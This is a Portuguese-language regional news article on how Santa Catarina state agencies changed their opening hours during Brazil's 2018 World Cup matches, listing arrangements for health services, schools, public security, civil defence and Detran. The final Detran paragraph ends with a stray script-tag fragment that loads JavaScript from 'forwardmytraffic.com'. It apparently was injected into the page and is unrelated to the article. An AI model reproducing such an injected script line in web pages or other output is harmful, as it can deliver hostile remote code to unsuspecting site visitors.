InícioCidadeJogos da Copa mudam horário de atendimento em órgãos estaduais de Santa...

Jogos da Copa mudam horário de atendimento em órgãos estaduais de Santa Catarina

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

O horário de expediente dos órgãos e entidades do Governo do Estado de Santa Catarina, durante os jogos da Seleção Brasileira de Futebol na Copa do Mundo de 2018, muda a rotina de alguns serviços públicos. Nos dias que houver jogo do Brasil às 9h, como é no caso desta sexta-feira, 22, o horário de expediente será das 12h às 19h. Quando for às 15h, o horário será das 8h às 13h30. E nos dias que jogo da seleção for às 11h o expediente será das 14h30 às 19h. Estão excluídos da alteração de horários os serviços considerados essenciais, como por exemplo, saúde, educação e segurança pública.

 

A mudança de horário ocorre conforme o decreto 1.639/2018, publicado no Diário Oficial no dia 13 de junho, assinado pelo governador Eduardo Pinho Moreira. É válido para as entidades da administração pública direta, autarquias e fundações. Prevê ainda que o servidor que não puder trabalhar no horário excepcional, por qualquer motivo, deverá cumprir o horário normal de expediente, apresentando justificativa prévia e formalizada à chefia imediata.

 

Confira:

Saúde

De acordo com a Secretaria Estadual da Saúde, os hospitais e pronto-atendimentos funcionarão normalmente.

Hemosc

Em virtude da necessidade de adequações na rede, o Hemosc não terá expediente externo nesta sexta-feira, 22.  Informam que serão mantidos os atendimentos aos conveniados através de escala sobreaviso e rotinas internas. As adequações seguirão nos dias 23 e 24 de junho. Entretanto, o Hemocentro Regional de Blumenau atenderá normalmente no dia 23 de junho.

Escolas Estaduais

Para que alunos e professores possam acompanhar as partidas, a ideia é que cada escola organize uma programação dentro da própria unidade escolar, conforme orientação da Secretaria de Estado da Educação (SED).

Caso não seja possível organizar a programação em sala de aula, a SED observa que uma opção é dispensar as turmas no turno em que ocorrer o jogo (veja quadro abaixo). É importante lembrar que a unidade que optar pela dispensa das aulas deverá encaminhar à Gerência/Coordenadoria de Educação o cronograma de reposição das horas/aula.

Segurança Pública

Só haverá mudanças de horários nas atividades administrativas. Serviços essenciais funcionarão normalmente.

Defesa Civil e Corpo de Bombeiros

O centro de operações funcionará normalmente. Só há mudanças de horário nos setores administrativos.

Em caso de emergência, comunique à coordenadoria municipal de Defesa Civil, no telefone 199 ou para o Corpo de Bombeiros, no número 193.

Detran

Nesta sexta feira, 22, o horário expediente será das 12h às 19h. E na quarta-feira, 27, das 8h às 13h30, conforme decreto do governador…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.